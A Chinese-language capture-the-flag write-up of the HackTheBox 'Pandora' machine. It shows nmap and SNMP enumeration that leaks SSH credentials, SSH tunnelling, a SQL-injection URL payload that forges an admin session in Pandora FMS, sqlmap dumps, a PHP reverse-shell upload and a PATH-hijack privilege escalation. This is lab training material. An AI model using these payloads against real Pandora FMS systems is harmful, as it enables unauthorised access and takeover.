HackTheBox - Machines - Pandora.

目标地址:10.10.11.136 攻击机地址:10.10.14.24

1.信息搜集

首先Nmap扫描端口,扫描靶机的地址,得知 22(SSH)、80(Web)端口开放,那么先到web页面看看有没有什么信息或可利用点

命令:nmap -sS -sV -sC -T4 10.10.11.136

Nmap scan report for 10.10.11.136
Host is up (0.31s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
| 256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_ 256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Play | Landing
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.18 seconds

这里我之前做的时候是直接解析成pandora.htb的,因历史解析的原因,这次做的时候直接访问到了。

第一次做pandora的时候,将域名解析地址写入hosts文件中即可。

访问到了web页面,没有发现什么有用的信息,扫描一下目录看看

目录也没有可用的信息,既然是靶场那么一定有突破点的。

用nmap再扫一下udp端口

这里可以看到snmp-netstat有我自己的ip地址,是因为在扫udp端口的时候我已经和靶机的snmp建立好了连接

命令:nmap -sS -sU -sC -sV -O -T4 10.10.11.136

Nmap scan report for 10.10.11.136
Host is up (0.32s latency).
Not shown: 998 closed tcp ports (reset), 994 closed udp ports (port-unreach)
Bug in snmp-win32-software: no string output.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
| 256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_ 256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Play | Landing
22/udp open|filtered ssh
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-processes:
| 1:
| 2:
| 3:
| 4:
| 6:
| 9:
| 10:
| 11:
| 12:
| 13:
| 14:
| 15:
| 16:
| 17:
| 18:
| 20:
| 21:
| 22:
| 23:
| 24:
| 25:
| 26:
| 27:
| 28:
| 29:
| 30:
| 77:
| 78:
| 79:
| 80:
| 81:
| 82:
| 83:
| 84:
| 85:
|_ 88:
| snmp-interfaces:
| lo
| IP address: 127.0.0.1 Netmask: 255.0.0.0
| Type: softwareLoopback Speed: 10 Mbps
| Traffic stats: 14.25 Mb sent, 14.25 Mb received
| VMware VMXNET3 Ethernet Controller
| IP address: 10.10.11.136 Netmask: 255.255.254.0
| MAC address: 00:50:56:b9:c8:18 (VMware)
| Type: ethernetCsmacd Speed: 4 Gbps
|_ Traffic stats: 18.62 Mb sent, 16.92 Mb received
| snmp-sysdescr: Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64
|_ System uptime: 13h44m13.92s (4945392 timeticks)
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: 48fa95537765c36000000000
| snmpEngineBoots: 30
|_ snmpEngineTime: 13h44m14s
| snmp-netstat:
| TCP 0.0.0.0:22 0.0.0.0:0
| TCP 10.10.11.136:22 10.10.14.24:1079
| TCP 10.10.11.136:22 10.10.14.24:1081
| TCP 10.10.11.136:48448 10.10.14.2:4321
| TCP 10.10.11.136:48756 10.10.14.2:4321
| TCP 10.10.11.136:54026 10.10.14.2:4321
| TCP 10.10.11.136:54808 1.1.1.1:53
| TCP 127.0.0.1:3306 0.0.0.0:0
| TCP 127.0.0.53:53 0.0.0.0:0
| UDP 0.0.0.0:161 *:*
|_ UDP 127.0.0.53:53 *:*
1885/udp open|filtered vrtstrapserver
16970/udp open|filtered unknown
20872/udp open|filtered unknown
37813/udp open|filtered unknown
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=2/10%OT=22%CT=1%CU=2%PV=Y%DS=2%DC=I%G=Y%TM=6204DB45%P=
OS:i686-pc-windows-windows)SEQ(SP=103%GCD=1%ISR=10E%TI=Z%CI=Z%II=I%TS=A)SEQ
OS:(SP=103%GCD=1%ISR=10E%TI=Z%CI=Z%TS=A)OPS(O1=M508ST11NW7%O2=M508ST11NW7%O
OS:3=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST11NW7%O6=M508ST11)WIN(W1=FE88%W2=
OS:FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M508NNSN
OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R
OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: Host: pandora; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1124.37 seconds

扫描结束后可以看到有一个snmp协议(简单网络管理协议)开在udp 161端口上。

可以尝试使用snmpwalk对其进行连接,snmpwalk可以在net-snmp官网去下载到

2.漏洞利用

连接命令:snmpwalk.exe -v 2c -c public 10.10.11.136

IOD列表:http://www.ttlsa.com/monitor/snmp-oid/

可以看到这里面有很多信息,包括主机名字、网络接口数、CPU使用情况等信息。

其中有一串OID对应的是这样的信息

看起来像是账号和密码,靶机开启了SSH的端口,使用该账号密码进行ssh连接测试

username:daniel,password:HotelBabylon23

C:\Users\kami>ssh [email protected]
[email protected]'s password:
Permission denied, please try again.
[email protected]'s password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Thu 10 Feb 09:47:53 UTC 2022

System load: 0.08
Usage of /: 63.1% of 4.87GB
Memory usage: 9%
Swap usage: 0%
Processes: 256
Users logged in: 0
IPv4 address for eth0: 10.10.11.136
IPv6 address for eth0: dead:beef::250:56ff:feb9:c818

=> /boot is using 91.8% of 219MB


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Wed Feb 9 19:49:10 2022 from 10.10.14.2
[email protected]:~$ whoami
daniel
[email protected]:~$ id
uid=1001(daniel) gid=1001(daniel) groups=1001(daniel)
[email protected]:~$

3.提权进行时

可以看到还有一个matt账户,在该账户下存在着user.txt应该就是flag了,但是没有权限查看,接下来就想办法提权到matt账户。

尝试进行suid sudo 计划任务提权,发现好像都没法进行提权。

curl一下自己看看呢。

拼接到url访问看看是个什么东西,为了便于展示,这里我将host文件进行了修改,ip对应到了pandora.htb域名

显示没找到,但是我在本机使用curl pandora.htb的时候明明可以看到呀。

ssh隧道来一波

C:\Users\kami>ssh -L 80:127.0.0.1:80 [email protected]
[email protected]'s password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Thu 10 Feb 10:04:59 UTC 2022

System load: 0.0
Usage of /: 63.1% of 4.87GB
Memory usage: 15%
Swap usage: 0%
Processes: 249
Users logged in: 1
IPv4 address for eth0: 10.10.11.136
IPv6 address for eth0: dead:beef::250:56ff:feb9:c818

=> /boot is using 91.8% of 219MB


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Thu Feb 10 09:47:54 2022 from 10.10.14.24

此时就代理成功了,浏览器直接访问127.0.0.1即可访问到靶机本地存在的web服务

页面标题就是 Pandora FMS 在页脚可以看到版本为v7.0NG.742_FIX_PERL2020

在https://cvedetails.com找到了对应的cve,存在着sql注入

可以看到在 pandora_console/include/chart_generator.php的session_id参数是注入点,那么直接丢进sqlmap跑一跑

跑出了库名,下一步表名,直到跑出session值。

+------------------------------------+
| taddress |
| taddress_agent |
| tagent_access |
| tagent_custom_data |
| tagent_custom_fields |
| tagent_custom_fields_filter |
| tagent_module_inventory |
| tagent_module_log |
| tagent_repository |
| tagent_secondary_group |
| tagente |
| tagente_datos |
| tagente_datos_inc |
| tagente_datos_inventory |
| tagente_datos_log4x |
| tagente_datos_string |
| tagente_estado |
| tagente_modulo |
| talert_actions |
| talert_commands |
| talert_snmp |
| talert_snmp_action |
| talert_special_days |
| talert_template_module_actions |
| talert_template_modules |
| talert_templates |
| tattachment |
| tautoconfig |
| tautoconfig_actions |
| tautoconfig_rules |
| tcategory |
| tcluster |
| tcluster_agent |
| tcluster_item |
| tcollection |
| tconfig |
| tconfig_os |
| tcontainer |
| tcontainer_item |
| tcredential_store |
| tdashboard |
| tdatabase |
| tdeployment_hosts |
| tevent_alert |
| tevent_alert_action |
| tevent_custom_field |
| tevent_extended |
| tevent_filter |
| tevent_response |
| tevent_rule |
| tevento |
| textension_translate_string |
| tfiles_repo |
| tfiles_repo_group |
| tgis_data_history |
| tgis_data_status |
| tgis_map |
| tgis_map_connection |
| tgis_map_has_tgis_map_con |
| tgis_map_layer |
| tgis_map_layer_groups |
| tgis_map_layer_has_tagente |
| tgraph |
| tgraph_source |
| tgraph_source_template |
| tgraph_template |
| tgroup_stat |
| tgrupo |
| tincidencia |
| titem |
| tlanguage |
| tlayout |
| tlayout_data |
| tlayout_template |
| tlayout_template_data |
| tlink |
| tlocal_component |
| tlog_graph_models |
| tmap |
| tmensajes |
| tmetaconsole_agent |
| tmetaconsole_agent_secondary_group |
| tmetaconsole_event |
| tmetaconsole_event_history |
| tmetaconsole_setup |
| tmigration_module_queue |
| tmigration_queue |
| tmodule |
| tmodule_group |
| tmodule_inventory |
| tmodule_relationship |
| tmodule_synth |
| tnetflow_filter |
| tnetflow_report |
| tnetflow_report_content |
| tnetwork_component |
| tnetwork_component_group |
| tnetwork_map |
| tnetwork_matrix |
| tnetwork_profile |
| tnetwork_profile_component |
| tnetworkmap_ent_rel_nodes |
| tnetworkmap_enterprise |
| tnetworkmap_enterprise_nodes |
| tnews |
| tnota |
| tnotification_group |
| tnotification_source |
| tnotification_source_group |
| tnotification_source_group_user |
| tnotification_source_user |
| tnotification_user |
| torigen |
| tpassword_history |
| tperfil |
| tphase |
| tplanned_downtime |
| tplanned_downtime_agents |
| tplanned_downtime_modules |
| tplugin |
| tpolicies |
| tpolicy_agents |
| tpolicy_alerts |
| tpolicy_alerts_actions |
| tpolicy_collections |
| tpolicy_groups |
| tpolicy_modules |
| tpolicy_modules_inventory |
| tpolicy_plugins |
| tpolicy_queue |
| tprofile_view |
| tprovisioning |
| tprovisioning_rules |
| trecon_script |
| trecon_task |
| trel_item |
| tremote_command |
| tremote_command_target |
| treport |
| treport_content |
| treport_content_item |
| treport_content_item_temp |
| treport_content_sla_com_temp |
| treport_content_sla_combined |
| treport_content_template |
| treport_custom_sql |
| treport_template |
| treset_pass |
| treset_pass_history |
| tserver |
| tserver_export |
| tserver_export_data |
| tservice |
| tservice_element |
| tsesion |
| tsesion_extended |
| tsessions_php |
| tskin |
| tsnmp_filter |
| ttag |
| ttag_module |
| ttag_policy_module |
| ttipo_modulo |
| ttransaction |
| ttrap |
| ttrap_custom_values |
| tupdate |
| tupdate_journal |
| tupdate_package |
| tupdate_settings |
| tuser_double_auth |
| tuser_task |
| tuser_task_scheduled |
| tusuario |
| tusuario_perfil |
| tvisual_console_elements_cache |
| twidget |
| twidget_dashboard |
+------------------------------------+
一共178张表,但是和session相关的只有三张表。
测试后选择dump tsessions_php表
+----------------------------+------------------------------------------------------+-------------+
| id_session | data | last_active |
+----------------------------+------------------------------------------------------+-------------+
| 09vao3q1dikuoi1vhcvhcjjbc6 | id_usuario|s:6:"daniel"; | 1638783555 |
| 0ahul7feb1l9db7ffp8d25sjba | NULL | 1638789018 |
| 1um23if7s531kqf5da14kf5lvm | NULL | 1638792211 |
| 226i87if97nt5hlqp51e9n8rrk | id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0; | 1644436354 |
| 2e25c62vc3odbppmg6pjbf9bum | NULL | 1638786129 |
| 346uqacafar8pipuppubqet7ut | id_usuario|s:6:"daniel"; | 1638540332 |
| 3me2jjab4atfa5f8106iklh4fc | NULL | 1638795380 |
| 4f51mju7kcuonuqor3876n8o02 | NULL | 1638786842 |
| 4nsbidcmgfoh1gilpv8p5hpi2s | id_usuario|s:6:"daniel"; | 1638535373 |
| 59qae699l0971h13qmbpqahlls | NULL | 1638787305 |
| 5fihkihbip2jioll1a8mcsmp6j | NULL | 1638792685 |
| 5i352tsdh7vlohth30ve4o0air | id_usuario|s:6:"daniel"; | 1638281946 |
| 69gbnjrc2q42e8aqahb1l2s68n | id_usuario|s:6:"daniel"; | 1641195617 |
| 81f3uet7p3esgiq02d4cjj48rc | NULL | 1623957150 |
| 883c23eu7d1ndarij0qtg3kd12 | id_usuario|s:5:"admin";alert_msg|a:0:{}new_chat|b:0; | 1644437290 |
| 8m2e6h8gmphj79r9pq497vpdre | id_usuario|s:6:"daniel"; | 1638446321 |
| 8upeameujo9nhki3ps0fu32cgd | NULL | 1638787267 |
| 9vv4godmdam3vsq8pu78b52em9 | id_usuario|s:6:"daniel"; | 1638881787 |
| a3a49kc938u7od6e6mlip1ej80 | NULL | 1638795315 |
| agfdiriggbt86ep71uvm1jbo3f | id_usuario|s:6:"daniel"; | 1638881664 |
| cojb6rgubs18ipb35b3f6hf0vp | NULL | 1638787213 |
| cs89puvbasun981denejfp64r2 | id_usuario|s:6:"daniel"; | 1644488590 |
| d0carbrks2lvmb90ergj7jv6po | NULL | 1638786277 |
| eng03tpqsi5243hajufjtmbdh3 | NULL | 1644488794 |
| f0qisbrojp785v1dmm8cu1vkaj | id_usuario|s:6:"daniel"; | 1641200284 |
| fikt9p6i78no7aofn74rr71m85 | NULL | 1638786504 |
| fqd96rcv4ecuqs409n5qsleufi | NULL | 1638786762 |
| g0kteepqaj1oep6u7msp0u38kv | id_usuario|s:6:"daniel"; | 1638783230 |
| g4e01qdgk36mfdh90hvcc54umq | id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0; | 1638796349 |
| gf40pukfdinc63nm5lkroidde6 | NULL | 1638786349 |
| gnniv81mf01km3js0874s9ktd3 | NULL | 1644437818 |
| heasjj8c48ikjlvsf1uhonfesv | NULL | 1638540345 |
| hsftvg6j5m3vcmut6ln6ig8b0f | id_usuario|s:6:"daniel"; | 1638168492 |
| jecd4v8f6mlcgn4634ndfl74rd | id_usuario|s:6:"daniel"; | 1638456173 |
| kp90bu1mlclbaenaljem590ik3 | NULL | 1638787808 |
| l33ouea0ibftaucjbdnv3spgfs | NULL | 1644488696 |
| ne9rt4pkqqd0aqcrr4dacbmaq3 | NULL | 1638796348 |
| ng1n291iilod73mebktb2vfu29 | id_usuario|s:6:"daniel"; | 1644436001 |
| o3kuq4m5t5mqv01iur63e1di58 | id_usuario|s:6:"daniel"; | 1638540482 |
| oi2r6rjq9v99qt8q9heu3nulon | id_usuario|s:6:"daniel"; | 1637667827 |
| pjp312be5p56vke9dnbqmnqeot | id_usuario|s:6:"daniel"; | 1638168416 |
| qq8gqbdkn8fks0dv1l9qk6j3q8 | NULL | 1638787723 |
| r097jr6k9s7k166vkvaj17na1u | NULL | 1638787677 |
| r6greufnpiikl6i06q7lcjgmnd | NULL | 1644448880 |
| rgku3s5dj4mbr85tiefv53tdoa | id_usuario|s:6:"daniel"; | 1638889082 |
| u5ktk2bt6ghb7s51lka5qou4r4 | id_usuario|s:6:"daniel"; | 1638547193 |
| u74bvn6gop4rl21ds325q80j0e | id_usuario|s:6:"daniel"; | 1638793297 |
| vdoohnc7hlr1fglc7gamjqljrk | NULL | 1644488427 |
+----------------------------+------------------------------------------------------+-------------+

可以看到,有daniel和admin、matt的session记录在里面。

通过poc:http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=’ union SELECT 1,2,‘id_usuario|s:5:“admin”;’ as data – exp

然后再访问后台http://127.0.0.1/pandora_console/,即可成功进入后台。

但是我这里在做的时候有人也在做,将后台页面覆盖为了一个cmd马的页面,所以只能直接执行命令了。

用python3反弹一个shell过来

成功拿到flag.

4.提权到root

首先看一下拥有suid权限的文件,这里看到有个pandora_backup为二进制文件

运行是会报错的,先不管,先生成ssh密钥文件进行ssh登录

生成ssh密钥,直接登录matt用户

生成之后 本地创建一个id_rsa 同样权限700 将生成的密钥粘贴进去

ssh连接即可

ssh连接之后,开始恶意伪造文件

创建一个tar,将matt的home路径注入环境变量,然后运行pandora_backup文件

此次靶场对我来说确实比较难,以至于全网搜索找寻wp…

5.补充进入后台:

通过poc:http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=’ union SELECT 1,2,‘id_usuario|s:5:“admin”;’ as data – exp

然后再访问后台http://127.0.0.1/pandora_console/,即可成功进入后台。

然后在 admin tools中找到file manager


点击上传,这里上传一个反弹shell的php即可,然后直接访问即可反弹。

上传后文件地址在pandora_console/images/ 下面

本地nc监听,访问http://127.0.0.1/pandora_console/images/1.php

即可收到。

参考文章:

https://zhuanlan.zhihu.com/p/458926451

https://blog.peterjbrowning.com/2022/01/htb-writeup-pandora